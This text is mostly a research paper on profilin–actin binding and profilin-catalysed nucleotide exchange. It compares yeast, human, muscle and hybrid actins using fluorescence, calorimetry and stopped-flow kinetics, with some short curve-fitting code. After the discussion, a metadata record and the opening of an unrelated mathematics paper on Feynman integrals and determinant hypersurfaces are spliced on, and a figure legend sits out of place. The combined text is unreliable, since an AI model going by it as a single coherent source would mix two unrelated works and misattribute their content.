The ability of profilin to preferentially sequester ATP-G-actin and to facilitate adenine nucleotide exchange from the actin is important, considering the role that an actin-dependent ATP hydrolysis cycle plays in actin dynamics. G-actin is a poor ATPase whose activity is stimulated by polymerization. Subsequent discharge of the Pi from ADP-Pi-F-actin occurs at different rates, depending on the particular actin isoform involved, and results in the generation of ADP-F-actin (11,12). In terms of filament stability, ATP- and ADP-Pi-actin are more stable than ADP-F-actin (13). After ADP monomers are released from the end of the actin filament, the bound ADP exchanges for ATP, and the polymerization cycle starts again. Profilin may have a role in facilitating this exchange and thereby help to regulate the dynamics of actin filament formation (13). However, the necessity for this rate enhancement may not be universally applicable. For example, plant profilin does not catalyze nucleotide exchange from actin (14). However, it can complement a profilin-deficient strain of Dictyostelium discoideum with little if any loss of normal cell behavior (15).
Although profilin generally is not thought of as an enzyme, it effectively acts as one in its facilitation of the actin nucleotide exchange reaction. It must first reversibly bind to the actin and then cause a conformational change that results in enhanced rates of release of the bound adenine nucleotide. Initial studies revealed that the extent of the enhancement is highly dependent on the type of profilin used. For example, under saturating conditions with muscle actin, mammalian profilin enhances the rate of exchange 30-1000-fold (16), yeast profilin enhances it 3-fold (17), and profilin from the plant Arabidopsis shows no enhancement of the exchange rate (14).
Initial studies also suggest that the nature of the binding of profilin to actin seems to depend on both the profilin and the actin involved. For example, human platelet profilin binds muscle actin about 50-fold more tightly than it binds yeast actin (17). The energetics that defines the actin-profilin interaction can be very different depending on the particular actin-profilin pair involved. Based on incomplete data obtained so far, change in enthalpy seems to control the interaction of yeast profilin with muscle actin, whereas change in entropy seems to drive the interaction of human profilin with muscle actin (17). Whether this difference applies only to these two actin-profilin pairs or is more general is not known. Insight into the molecular basis of the profilin-actin interaction came from the crystallographic studies of the profilin-actin complex carried out by Schutt and co-workers (18,19). Profilin binds to actin across actin subdomains 1 and 3 at the barbed end of the actin monomer, and this interaction seems to result in an opening of the cleft separating the two domains of the actin molecule in which the ATP resides. This opening occurs by a pivoting motion of the two domains around a hinge region involving a helix containing residues 137-144 in the bridge between subdomains 1 and 3 (20). However, the manner in which this movement is brought about is not understood.
To gain more insight into the mechanism governing the profilin-dependent acceleration of the release of actin-bound nucleotide, we have carried out a detailed study of both the binding and exchange reactions involving the interaction of both yeast and human profilins with both muscle and yeast actins. We were especially interested in the yeast/muscle actin comparison, because yeast actin inherently exchanges its nucleotide 30 times faster than does muscle actin despite the 87% homology between the two proteins (17,21). We also present work with a hybrid actin we have constructed in which subdomains 1 and 2 are from muscle actin and subdomains 3 and 4 are from yeast actin to better understand the relative importance of subdomains 1 and 3 in its interaction with profilin.
MATERIALS AND METHODS
Protein Preparations-Yeast hybrid and H372R mutant actins were generated as described previously (22,23). Yeast wild type (WT) 2 and mutant actins were purified by a combination of DNase I affinity chromatography and DEAE-cellulose chromatography as described by Cook et al. (24). Globular actins (G-actins) were stored in G buffer (10 mM Tris-HCl, pH 7.5, 0.2 mM CaCl2, 0.2 mM ATP, and 0.1 mM dithiothreitol) at 4°C and used within 5 days. The yeast profilin and human profilin I Escherichia coli expression plasmids were kindly provided by S. Almo (Albert Einstein College of Medicine) and D. Schafer (University of Virginia), respectively. The mutant human profilin I molecules were engineered using the QuikChange site-directed mutagenesis kit from Stratagene (La Jolla, CA). All profilins were expressed in E. coli BL21 and purified with a procedure similar to that described by Eads et al. (17) with modifications. Briefly, the cells expressing the profilin were lysed by sonication in the presence of 1 unit/μl rLysozyme™ (Novagen, San Diego, CA) and 50 μg/ml DNase I (Worthington). The profilin in the cell supernatant obtained by centrifugation of the cell lysate was further purified by polyproline affinity chromatography and Q Sepharose Fast Flow chromatography. SDS-PAGE of the final material on 15% acrylamide gels revealed a single band. The concentration of yeast or human profilin was determined spectrophotometrically using an ε280 of 20,300 or 10,800 M−1 cm−1, respectively (17). Purified profilins were stored at 4°C.
Etheno-ATP (εATP)-bound Actin Preparation and Actin Binding Assay-εATP-bound G-actin was prepared as described by Wen (25) with modifications. Briefly, the free nucleotide was removed from G-actin stock solutions by centrifugation through Zeba Desalting Spin Columns (Pierce) pre-equilibrated with G0 buffer (10 mM Tris-HCl, pH 7.5, 0.4 mM CaCl2, and 1 mM dithiothreitol) at 4°C as described by the manufacturer's protocol. A 20 μM G-actin solution in ATP-free G buffer was incubated with εATP (Invitrogen) at a final concentration of 1 mM at 4°C overnight. Unbound nucleotide was removed by desalting as above in the presence of 0.4 mM CaCl2, which was present throughout the remainder of the procedure. Thus, following the final desalting, the solution containing the 20 μM nucleotide-G-actin complex was in the presence of 0.4 mM CaCl2. Profilin at various concentrations was mixed at 25°C in G0 buffer with 1 μM εATP-G-actin to a final volume of 1.5 ml. Free ATP was added to the reaction mixture to a final concentration of 250 μM with constant stirring. Thus, at this time, the free Ca2+ was approximately 150 μM for all reactions tested.
The decrease in fluorescence due to the dissociation of actin-bound εATP was monitored over time with a Fluorolog-3 instrument containing a thermostatted sample holder (Spex, Edison, NJ) at an excitation wavelength of 340 nm and an emission wavelength of 410 nm. The net fluorescence change was determined at each time point and normalized against the total fluorescence change at the end of the exchange. The actin-bound εATP dissociation rate for each experiment was obtained by fitting each individual normalized data set to a single-exponential function using Excel software (Microsoft).
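The single-exponential fit described above can be reproduced in a few lines; the sketch below uses SciPy rather than the Excel fit reported in the text, with a synthetic trace standing in for the measured fluorescence time course.

```python
# Fit a normalized fluorescence decay F(t) = exp(-k*t) to extract k_obs.
import numpy as np
from scipy.optimize import curve_fit

def single_exp(t, k):
    return np.exp(-k * t)  # normalized: F(0) = 1, F(inf) = 0

t = np.linspace(0, 600, 120)                               # s, placeholder time base
F = np.exp(-0.01 * t) + np.random.normal(0, 0.01, t.size)  # synthetic "data"
(k_obs,), _ = curve_fit(single_exp, t, F, p0=[0.005])
print(f"k_obs = {k_obs:.4f} s^-1")
```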
For assessing the effects of profilin on the nucleotide exchange rate, the data at different profilin concentrations were analyzed with Excel and fitted to Equation 1,

kobs = (ka[A] + kpa([A]T − [A]))/[A]T, with [A][P] = Kd([A]T − [A])    (Eq. 1)

where kobs is the observed dissociation rate constant, ka is the dissociation rate constant of G-actin in the absence of profilin, kpa is the theoretical dissociation rate constant of the profilin-G-actin complex, [A]T is the concentration of total actin, [A] is the concentration of free G-actin, [P] is the concentration of free profilin, and Kd is the dissociation equilibrium constant of the complex. To obtain the best fit, kpa was subjected to the constraint that it be larger than ka.
Isothermal Titration Calorimetry (ITC)-ITC measurements were performed using a VP-ITC calorimeter (MicroCal, Northampton, MA). The concentrations of the profilin and actin were measured by UV absorption at 280 or 290 nm as described above, and the proteins were degassed before each experiment. Titrations were performed in 20 mM PIPES, pH 7.5, 0.2 mM ATP, 0.2 mM CaCl2, and 1 mM dithiothreitol. The concentrations of profilin and the actin mutants varied among experiments, and all interactions were measured twice. Heats of dilution were calculated by averaging the last 3-5 injections and were then subtracted from the raw data. The data sets were then analyzed individually using a single-site binding model from the ORIGIN ITC analysis software package provided by the VP-ITC calorimeter manufacturer. In this analysis, the values for stoichiometry (n), change in enthalpy (ΔH), and the affinity constant (Ka) were fit using nonlinear least squares analysis. The reported values for n, ΔH, and Ka are the average and S.D. of all injections for an individual interaction.
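For the Equation 1 analysis, the bound-complex concentration follows from the quadratic form of the binding equilibrium, and kobs is the population-weighted average of ka and kpa. The sketch below implements that fit with SciPy; the profilin titration values are synthetic, and the variable names follow the definitions above.

```python
# Fit k_obs versus total profilin to Equation 1 with quadratic binding.
import numpy as np
from scipy.optimize import curve_fit

A_T = 1.0  # uM total actin, as in the exchange assays

def k_obs_model(P_T, k_a, k_pa, K_d):
    b = A_T + P_T + K_d
    PA = (b - np.sqrt(b**2 - 4 * A_T * P_T)) / 2  # [profilin-actin] from the quadratic
    return (k_a * (A_T - PA) + k_pa * PA) / A_T

P_T = np.array([0, 0.5, 1, 2, 4, 8, 16])          # uM total profilin
k_obs = k_obs_model(P_T, 0.02, 0.2, 3.0)          # synthetic "data"
popt, _ = curve_fit(k_obs_model, P_T, k_obs, p0=[0.02, 0.1, 1.0])
print(dict(zip(["k_a", "k_pa", "K_d"], popt)))
```

Note that Equation 1 as written uses the free profilin concentration; parameterizing the fit in total profilin, as above, avoids having to solve for [P] separately.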
Kinetics of Profilin Binding to G-actin-The kinetics of the binding of profilin to G-actin was monitored over time by the decrease in intrinsic tryptophan fluorescence caused by the interaction, using a BioLogic SFM3 stopped-flow instrument (BioLogic). The data were further analyzed with Kinsim/Fitsim software (available on the World Wide Web) and fitted to the following one-step binding model (Reaction 1),

A + P ⇌ AP    (Reaction 1)

where A represents G-actin, P is profilin, and AP is the actin-profilin complex. The kinetic rate constants (kon and koff) of profilin binding to actin were obtained by averaging fits of data from at least three sets of experiments with different profilin concentrations. The Kd was calculated as koff/kon.
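The Kinsim/Fitsim analysis amounts to integrating the two-state binding scheme and fitting the simulated trace to the stopped-flow record. A minimal sketch of the forward simulation with SciPy (rate constants and concentrations below are placeholders, not the fitted values from this study):

```python
# Integrate A + P <-> AP and report the approach of [AP] to equilibrium.
import numpy as np
from scipy.integrate import solve_ivp

k_on, k_off = 5.0, 10.0  # uM^-1 s^-1 and s^-1 (placeholders); K_d = k_off/k_on = 2 uM
A0, P0 = 1.0, 5.0        # uM after mixing

def rhs(t, y):
    A, P, AP = y
    v = k_on * A * P - k_off * AP  # net association flux
    return [-v, -v, v]

sol = solve_ivp(rhs, (0, 1.0), [A0, P0, 0.0], t_eval=np.linspace(0, 1.0, 50))
print(f"[AP] at 1 s = {sol.y[2][-1]:.3f} uM")  # approaches ~0.68 uM at equilibrium
```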
RESULTS
Our goal was to determine the molecular basis underlying the ability of profilin to facilitate the exchange of nucleotide from actin. Toward this end, we analyzed the interaction of yeast and human profilins with yeast and muscle actin. These two actin isoforms are 87% identical in sequence (21), and they vary in only three residues within what is thought to constitute the profilin binding surface (17). Residues Glu167, Tyr169, and Arg372 in muscle actin are replaced by Ala167, Phe169, and His372, respectively, in yeast actin.
We first assessed the rate of nucleotide exchange brought about by increasing concentrations of profilin in the presence of a constant amount of actin. In this analysis, the Kd for the actin-profilin interaction can be derived from the first-order rate constants for the decrease in fluorescence resulting from the exchange of bound εATP from the actin surface. This analysis has been used previously (5) and is described under "Materials and Methods." Fig. 1A shows the increase in nucleotide exchange rate from yeast actin caused by saturating concentrations of yeast profilin (YPF) and human profilin 1 (HPF1). HPF1 produces a 10-fold increase in this rate, whereas YPF produces only a 4-fold acceleration (Table 1). For muscle actin with YPF, there was 3-fold activation (17), and with HPF1 and muscle actin, there was a 35-fold enhancement (data not shown). Clearly, the small enhancement of nucleotide exchange previously observed with yeast actin and yeast profilin does not result from some maximal rate at which yeast actin can exchange nucleotide due to its inherently more open conformation (17,26). HPF1, at saturating conditions, is simply a better catalyst of nucleotide exchange than YPF, whether yeast or muscle actin is utilized. Fig. 1B shows the rate constants calculated from curves similar to those described in Fig. 1A for the interaction of different concentrations of YPF or HPF1 with yeast actin. Table 1 shows that, as in the case involving the two profilins with muscle actin (17), the homologous pair had a Kd about 5 times stronger than that exhibited by the heterologous pair. However, it is apparent from the data that Kd and rate-enhancing ability do not strictly correlate.
Figure 1. (A) The data for each curve were fit to a first-order decay curve to obtain kobs. Red, YPF; blue, HPF1; black, no profilin. Empty circles, data points; solid lines, fits. The same experiment was performed twice with essentially the same results; one of the two studies is shown here. (B) The observed dissociation rates (kobs) obtained from the actin-bound εATP exchange of 1 μM yeast WT actin as described in Fig. 1 in the presence of either YPF (open circles) or HPF1 (open squares) were plotted against the varying profilin concentrations used. Each experimental data set was simulated with Equation 1 and depicted with solid symbols and lines. The experiment was performed twice with essentially identical results; one experiment is shown here.
A better measure of catalytic activity with respect to enzyme function is the catalytic efficiency, k_cat/K_d, since most enzymes do not work at saturating conditions. This may very well be the case in vivo for profilins (16, 27). To apply this analysis to the profilin/actin system, for a given actin, we divided the fold enhancement of the exchange rate by the K_d for the particular actin-profilin pair. With yeast actin, this efficiency measure was 6.7 μM⁻¹ for YPF and only 3 μM⁻¹ for HPF1 (Table 1). Based on the data referred to above, the catalytic efficiency for the HPF1-muscle actin pair is 350 μM⁻¹. From the work of Eads et al. (17), the catalytic efficiency of the YPF-muscle actin pair is about 1 μM⁻¹. In summary, the homologous set of proteins was always more efficient than the heterologous pair.
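The efficiency measure is simple arithmetic once the fold enhancement and K_d are known. The snippet below illustrates the calculation; the fold values are those quoted above, while the K_d values are back-computed from the quoted efficiencies (6.7 and 3 μM⁻¹) and are therefore only illustrative.

```python
# Catalytic efficiency = fold enhancement of exchange rate / Kd.
pairs = {
    "yeast actin + YPF (homologous)":    {"fold": 4.0,  "Kd_uM": 4.0 / 6.7},
    "yeast actin + HPF1 (heterologous)": {"fold": 10.0, "Kd_uM": 10.0 / 3.0},
}
for name, p in pairs.items():
    print(f"{name}: {p['fold'] / p['Kd_uM']:.1f} per uM")
```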
We next used ITC to examine the energetics that characterize the interaction of yeast actin with yeast and human profilins. Fig. 2A shows the experimental data for the repeated injection of YPF into a solution of yeast actin, and Fig. 2B presents the corrected integrated data with a curve fit for the data in Fig. 2A. Values for ΔH and TΔS were then extracted from these data as described under "Materials and Methods." Table 2 shows these values along with the corresponding values for K_a or K_d for the interaction of yeast and human profilins with yeast actin. For the sake of comparison, values obtained previously for the interaction of these two profilins with muscle actin are shown (17). With both actins, the interaction with YPF is strongly enthalpically driven; the change in entropy is actually unfavorable. Conversely, for HPF1, although the change in enthalpy is favorable, it is much less so than for YPF. This lower ΔH, however, is offset by a favorable change in entropy. The data demonstrate that the nature of the profilin isoform, and not the actin isoform, appears to dictate the energetics that characterize the interaction of these two proteins. It is interesting that the nature of the interactions is so different, considering that the profilin binding surface on actin is very much alike for the different isoforms involved.
Role of Human Profilin Residue Glu 82 in the Actin-bound Nucleotide Exchange-We wished to gain insight into the reason that HPF1 produced a faster nucleotide exchange rate than did YPF. In comparison with YPF, mammalian profilins contain an extra loop between Leu 78 and Asp 86. Based on the β-actin-bovine profilin co-crystal (18), Glu 82 in this loop might form a hydrogen bond with actin Lys 113 in subdomain 1, which is conserved in both yeast and muscle actins, as shown in Fig. 3. Lys 113 is located on the back face of the actin monomer close to His 73 and the hinge region. This extra actin Lys 113-profilin Glu 82 hydrogen bond might enhance the ability of profilin to open the actin cleft, leading to the greater rate of exchange that is observed. To test this hypothesis, we mutated HPF1 Glu 82 to Lys, Ser, or Ala and assessed the actin-bound εATP release rate in the presence of the mutant profilins. Fig. 4 demonstrates that at saturating concentrations, all three mutant profilins facilitate yeast actin nucleotide exchange 9-13-fold, similar to the value obtained with WT HPF1. The mutations also cause little if any effect on the K_d for the actin-profilin interactions (data not shown). A similar enhancement for muscle actin-bound ATP was also observed (data not shown). Thus, the ability to form this postulated hydrogen bond is not critical for catalysis of nucleotide exchange or for the affinity of the interaction.
Role of Actin Residue 372 in the Actin-Profilin Interaction-It had been suggested that Arg 372 in subdomain 1 of muscle actin, via its ability to hydrogen-bond with residue Tyr 79 in Schizosaccharomyces pombe profilin (Tyr 78 in Saccharomyces cerevisiae profilin; Asp 86 in mammalian profilin), played a major role in profilin-dependent catalysis of actin nucleotide exchange (28). Yeast actin contains a His at this position. To address the importance of Arg 372 in the actin-profilin interaction, we assessed the ability of YPF to catalyze nucleotide exchange from H372R yeast actin. As with WT actin, the profilin-catalyzed rate was 2.5 times that observed for actin alone. However, the binding affinity of this mutant actin (K_d = 0.06 μM) was about 10-fold greater than observed with WT actin, resulting in a large increase in catalytic efficiency for the YPF-dependent nucleotide exchange, from 6.7 to 42 μM⁻¹. Again, these observations demonstrate a lack of correlation between tightness of the binding and catalytic ability at saturating profilin concentrations.

Characterization of Profilin Interaction with Yeast/Muscle Hybrid Actins-To gain greater insight into the relative contribution of the two actin domains to actin-actin-binding protein interactions, we had previously constructed two yeast/muscle hybrid actins in which either yeast actin subdomain 1 (sub1) or both subdomains 1 and 2 (sub12) had been converted to their muscle counterparts (22). In the most complete hybrid, sub12, 21 yeast residues had been substituted with their corresponding muscle residues. As the extent of muscle character of the actin increased, the nucleotide exchange rate slowed until, in sub12, it was equal to that observed with muscle actin (22). Evidently, the structure of subdomain 1 of actin plays a major role in dictating the nucleotide exchange properties of the protein.

[Figure legend: the decrease in fluorescence caused by εATP exchange was followed over time, and data were fit to a first-order reaction mechanism (solid lines) as described under "Materials and Methods." The experiment was repeated with essentially the same results, and one data set is shown. a.u., arbitrary units.]

Since these hybrid actins would contain a hybrid profilin binding site (yeast subdomain 3 and muscle subdomain 1), they presented an opportunity to determine the relative roles played by each domain in both the binding of profilin to actin and the ability of profilin to accelerate nucleotide exchange. Fig. 5 and Table 3 show that for both sub1 and sub12 actins, both profilins at saturating conditions produced about a 16-20-fold acceleration of εATP exchange. Note that the starting rates in the absence of profilin for sub1 and sub12 are 0.007 and 0.003 s⁻¹, respectively. The K_d values for the interaction of YPF were about 2 μM for each of the hybrid actins. This value is higher than that for yeast actin and somewhat lower than that for muscle actin, as might be expected for a hybrid molecule. However, the analysis involving HPF1 produced unexpected results: the K_d values for sub1 (5.6 μM) and sub12 actins (8.1 μM) were 70-80-fold higher than with muscle actin, which has a K_d of 0.1 μM (data not shown), and 3-4-fold larger than with yeast actin. Meanwhile, the catalytic efficiencies for the YPF/sub1 and YPF/sub12 complexes are 7.6 and 11 μM⁻¹, and the catalytic efficiencies for the HPF1 complexes are 3 and 2 μM⁻¹.
These efficiencies are similar to those seen with YPF/HPF1 binding to yeast actin, far different from the efficiency of the HPF1-muscle actin complex based on the data from Eads et al. (17). This result suggests that actin subdomain 3 is the major determinant in the regulation of the catalytic efficiency of the actin-profilin complex.
To explore further the reason for the greater effect of the hybrid nature of the actin on HPF1 versus YPF binding, we repeated the ITC analysis with the two profilins using the two hybrid actins. As seen in Fig. 6 and Table 4, for both profilins, the enthalpic and entropic contributions with sub12 actin were similar to those observed with the WT actins. The YPF interaction is completely enthalpically driven, whereas the HPF1 interaction is both enthalpically and entropically driven. Surprisingly, for sub1 actin missing the three sub2 muscle residues, there is a sharp decrease in enthalpic change and a marked increase in entropic change for both profilins. This result suggests that either the interaction of actin subdomains 1 and 2 with each other or interactions between the two domains of actin across the nucleotide cleft plays a major role in dictating the topography of the surface at the barbed end of the protein where the profilin binds.
Contribution of Three Muscle Actin-specific Subdomain 2 Residues to the Profilin-Actin Interaction-Yeast and muscle actin subdomain 2 differ from one another by only three residues. The yeast-to-muscle changes, all very similar in nature to the original residues, are I43V, R68K, and V76I. However, when added to the sub1 hybrid actin, these residues together cause a 2-fold retardation in the rate of nucleotide exchange, to near that seen with muscle actin, and they drastically alter the energetics of profilin binding to the actin, as shown above.
To determine the relative contributions of each of these three residues to these differences in actin behavior, each was introduced independently into sub1 actin. Compared with the exchange rate for sub1 actin alone (0.007 s⁻¹), I43V + sub1 or R68K + sub1 actins showed a mildly retarded exchange rate (0.005 s⁻¹) (Fig. 7). The addition of the V76I mutation, the residue nearest the binding site for the nucleotide phosphate, caused the greatest retardation in rate (0.003 s⁻¹), a value near that observed with muscle actin and sub12 actin (Fig. 7). All of these experiments were repeated twice with essentially the same results. To determine whether position 76 also exhibited the greatest influence on the profilin-binding properties of actin, we repeated the ITC profilin binding assay with each of these three new mutant actins. Table 5 shows that each of these mutant actins had nearly the same K_d with respect to YPF binding. However, there were small but position-specific differences in the changes in enthalpy and entropy. I43V sub1 was much closer to sub12 actin in terms of having the greatest negative change in enthalpy and the least favorable entropic change. R68K sub1 and V76I sub1 actins, virtually identical to one another in K_d, had less of an enthalpic contribution, by about 1.5 kcal/mol, and a positive entropic change, a profile like that seen with sub1 actin. Thus, the substitution that exerted the most effect on actin nucleotide exchange per se was different from that which most affected the interaction of actin with profilin.
Kinetics of Binding of Yeast Profilin to WT, sub1, and sub12 Yeast Actins-The differences in thermodynamics describing the interaction of YPF with WT, sub1, and sub12 actins might be reflected in differences in the k_on and k_off of complex formation, which could affect the lifetime and stability of the profilin-actin complex and thereby the catalysis of nucleotide exchange. To determine these constants, we followed the change in intrinsic tryptophan fluorescence that occurs when profilin binds to actin, using a stopped-flow apparatus. Modeling of the decay curves (Fig. 8) as described under "Materials and Methods" allowed an extraction of the k_on and k_off for each of these interactions (Table 6). The K_d values obtained from the ratio k_off/k_on are consistent with those obtained by the exchange and ITC assays. Although there appear to be relatively small differences in k_on and k_off for the three actins tested, these differences were not statistically significant by t test.
DISCUSSION
Our primary focus was to determine the factors that regulate the ability of profilin to bind to actin and then to promote the exchange of nucleotide from actin. This knowledge is necessary to appreciate the molecular basis that governs profilin regulation of actin filament dynamics within the cell. Our basic approach was to use two different profilins, YPF and HPF1, along with muscle, yeast, and yeast/muscle hybrid actins to try to gain insight into the control of these two processes at the molecular level. The results we have obtained have provided new insight into the manner in which profilin binds to actin and influences actin conformation, important for both the role of profilin as an actin buffer and as a facilitator for formin-dependent filament elongation. They also provide insight into how this binding reaction can be translated into facilitation of actin-dependent nucleotide exchange.
Catalysis of Nucleotide Exchange-We first addressed the ability of profilin to facilitate actin nucleotide exchange under saturating profilin concentrations. Our results clearly demonstrate that, independent of the actin substrate, HPF1 is better able to catalyze nucleotide exchange than is YPF. One might imagine that two proteins from the same cell co-evolve to produce the most effectively acting system. Since yeast actin assumes a more open conformation compared with muscle actin (26), one could hypothesize that the actin cleft can only be opened so far to promote nucleotide exchange before the protein denatures. Consequently, the small degree of enhancement of nucleotide exchange associated with the YPF-yeast actin interaction would reflect this limiting rate. What appeared to be this limit based on YPF experiments can clearly be exceeded by HPF1. However, the inherently increased flexibility of yeast versus muscle actin may still be a significant factor in the differences in the fold increase in profilin-dependent release rate we observed using these two actins.
Minehardt et al. (29), based on molecular dynamics simulations, proposed that the open cleft state seen in the profilin-actin crystal complex is by itself very unstable and rapidly collapses to the closed state. In essence, there is an unfavorable equilibrium between the closed and open cleft states, and the role of profilin is to stabilize the small amount of open state that would exist, thereby promoting nucleotide exchange. Thus, the rate enhancement is passively rather than actively brought about. Our results show that, with either yeast or muscle actin, two different profilins cause different degrees of enhancement of the exchange rate. It had also been reported that plant profilin causes no rate enhancement (14). In the Minehardt et al. (29) paradigm, this result would imply a number of conformations of actin between the open and closed states, each of which would be preferentially captured by a different profilin. A plausible alternative model is that the profilin binds the closed state and uses the binding energy to open the cleft to the degree that is permitted by the specific profilin being used.
Based on the crystal structure of the actin-profilin complex, a potential explanation for the ability of HPF1 to enhance nucleotide exchange better than YPF is the presence of an extra loop on the human profilin, which, through residue Glu 82, might form a hydrogen bond with Lys 113 on actin. This extra attachment between the two proteins might generate a lever arm that the human profilin could utilize to more easily alter the nucleotide cleft on actin, leading to enhanced exchange. However, when we tested this theory by eliminating the Glu at position 82, no deleterious effect was produced on the nucleotide exchange caused by HPF1. Thus, the basis for this difference in catalytic ability between HPF1 and YPF must not involve formation of this interprotein bond.
Analysis of the Binding of Profilin to Actin-Our results provide new insight into the factors that regulate the binding of profilin to actin. In all cases we examined, the homologous pair of proteins (e.g. YPF and yeast actin) exhibited a tighter interaction than did a heterologous pair, and both homologous pairs had about the same K_d. What was interesting is that tight binding did not necessarily correlate with increased ability to alter the conformation of the actin around the bound nucleotide, leading to exchange. Our data also showed that, using the biologically more meaningful comparison of catalytic efficiency (fold increase in exchange rate/K_d), the homologous yeast actin-YPF and muscle actin-HPF1 pairs are clearly more efficient than the heterologous pairs.
Studies with Yeast/Muscle Hybrid Actins-Based on crystallographic evidence (18,19), the profilin binding site on actin, at the barbed end of the protein, spans actin subdomains 1 and 3 across the interdomain hinge helix. It has been estimated that between the two proteins, about 70% of the contacts involve subdomain 3 (17,30). Furthermore, across the entire profilin binding surface on actin, there are only three differences between the yeast and muscle actins. However, the binding parameters that characterize the interaction of the same profilin with different actins are strikingly different. This result strongly suggests that despite the high homology among different actins in terms of primary and tertiary structure, the few differences must alter the topography of the profilin binding site on the actin surface enough to affect the manner in which the pair of proteins interacts to form the complex.
The use of our yeast/muscle hybrid actins allowed us to gain insight into the contributions of actin subdomains 1 and 3 to this difference. For both hybrid actins, which contain muscle subdomain 1, YPF binds about 3-4 times more tightly than does HPF1, consistent with subdomain 3 (yeast in this case) being the predominant binding surface. Although the data suggest that subdomain 3 is a major regulator of binding tightness, the contribution of actin subdomain 1 to binding is not inconsequential. In mammalian profilin, there is a potential hydrogen bond between profilin Asp 86 (Tyr 79 and Tyr 78 in S. pombe and S. cerevisiae profilins, respectively) and actin Arg 372 in subdomain 1. In plant profilin, the residue in this position is replaced by an Arg, which would cause a repulsive interaction. Lu and Pollard (28) altered Tyr 79 in S. pombe profilin to Arg, resulting in a significant weakening of binding and a loss of ability to catalyze nucleotide exchange. We examined the importance of this hydrogen bond from the perspective of actin. Yeast actin has His 372 instead of Arg and should make a much weaker hydrogen bond. In our hands, conversion of His 372 to Arg, which would strengthen the interprotein interaction, caused about 8-fold tighter binding with profilin but no change in exchange activity, again consistent with the lack of an obligatory coupling between binding affinity and catalytic capability.
Our binding data concerning the importance of actin subdomain 3 are consistent with a proposal recently made by Zheng et al. (31) regarding the basis of the preference of profilin for ATP-actin over ADP-actin. They predicted a nucleotide-dependent change in conformation of a loop involving actin residues 165-175, which might contribute to the selectivity observed with profilin. Interestingly, two of the three divergent residues between yeast and muscle actin in the profilin binding site, residues 167 and 169, fall in this loop in actin subdomain 3, consistent with our results.
Profilin/Actin Binding Energetics-Our ITC experiments allowed us to examine separately the enthalpic and entropic contributions to the actin-profilin interaction. Using the muscle and yeast WT actins, we showed that the profilin, not the actin, seems to dictate the energetics of binding. For both actins, the binding of YPF was largely enthalpically driven, whereas that of HPF1 was much less enthalpically and much more entropically dependent. We observed an intriguing difference between the interaction of sub1 and sub12 hybrid actins with YPF; sub1 actin produced an entropically driven interaction, as seen with HPF1, whereas sub12 yielded an enthalpically driven interaction, typical of YPF. These observations suggest that subdomains 1 and 2 co-evolved in order to maintain the allosteric connections that would allow the entire domain containing these subdomains to function as an integrated unit. If this unit is intact, as is the case for the sub12 actin, our results suggest that actin subdomain 3 exerts the most influence over the manner in which actin and profilin interact. Creation of a subdomain 1/subdomain 2 mismatch, as in the case of sub1 actin, would destroy this integration, leading to a situation where subdomain 1 was now acting in an uncoupled fashion. The result of this creation would be an altered binding surface that results in a switch from enthalpically to entropically dominant binding of profilin.
To gain more insight into the basis of the alteration in the nucleotide exchange and profilin binding behavior caused by the introduction of the three actin subdomain 2 muscle residues, we examined the results of the individual subdomain 2 mutations against an otherwise muscle subdomain 1 background. For both nucleotide exchange and profilin binding, there was a predominant residue responsible for the switch. Surprisingly, however, the predominantly responsible residue was different for each process. For nucleotide exchange, the biggest influence was exerted by the V76I mutation. Residue 76 lies in a group of five tightly packed residues extending from residue 118 on the outer surface of actin through His 73 to the nucleotide binding site. If the V76I conversion results in tighter packing with a resulting closure of the interdomain cleft, the result might very well be the retarded rate of nucleotide exchange that our results demonstrate. For energetics of binding, the main influence seemed to be exerted by the I43V substitution in the DNase I loop, the farthest of the three residues away from the proposed profilin binding site. Previous studies have shown that the N-terminal part of the DNase I loop is very influential in terms of the allosteric behavior of the protein.
There is demonstrated allostery between the actin C terminus in subdomain 1 and the DNase I loop (32). Additionally, cleavage of the loop at residues 42 and 43 by E. coli protease drastically affects actin polymerization as well as the monomeric behavior of the actin (33).
In conclusion, understanding how the allosteric integration between actin subdomains 1 and 2 results in the conformational control that regulates profilin binding and other actindependent processes is a major challenge for the future. The approach we have taken and the results we have obtained provide a foundation for this type of investigation and insight into how answering this question might be best achieved. | 2018-04-03T03:32:06.381Z | 2008-04-04T00:00:00.000 | {
"year": 2008,
"sha1": "43d1a3fac7b83725102ecfcf9b51dc5ad4c56373",
"oa_license": "CCBY",
"oa_url": "http://www.jbc.org/content/283/14/9444.full.pdf",
"oa_status": "HYBRID",
"pdf_src": "Highwire",
"pdf_hash": "340c9ce1c8aecd32f08efcd8713eaf61905931a8",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
5837709 | pes2o/s2orc | v3-fos-license | Parametric Feynman integrals and determinant hypersurfaces
The purpose of this paper is to show that, under certain combinatorial conditions on the graph, parametric Feynman integrals can be realized as periods on the complement of the determinant hypersurface in an affine space depending on the number of loops of the Feynman graph. The question of whether the Feynman integrals are periods of mixed Tate motives can then be reformulated (modulo divergences) as a question on a relative cohomology being a realization of a mixed Tate motive. This is the cohomology of the pair of the determinant hypersurface complement and a normal crossings divisor depending only on the number of loops and the genus of the graph. We show explicitly that this relative cohomology is a realization of a mixed Tate motive in the case of three loops and we give alternative formulations of the main question in the general case, by describing the locus of intersection of the divisor with the determinant hypersurface complement in terms of intersections of unions of Schubert cells in flag varieties. We also discuss different methods of regularization aimed at removing the divergences of the Feynman integral.
Introduction
The question of whether Feynman integrals arising in perturbative scalar quantum field theory are periods of mixed Tate motives can be seen (see [10], [9]) as a question on whether certain relative cohomologies associated to algebraic varieties defined by the data of the parametric representation of the Feynman integral are realizations of mixed Tate motives. In this paper we investigate another possible viewpoint on the problem, which leads us to consider a different relative cohomology, defined in terms of the complement of the affine determinant hypersurface and the locus where the hypersurface intersects the image of a simplex under a linear map defined by the Feynman graph. For all graphs with a given number of loops ℓ, admitting a minimal embedding in an orientable surface of genus g, and satisfying a natural combinatorial condition, we relate the question mentioned above to a problem in the geometry of coordinate subspaces of an ℓ-dimensional vector space, which only depends on the genus g.
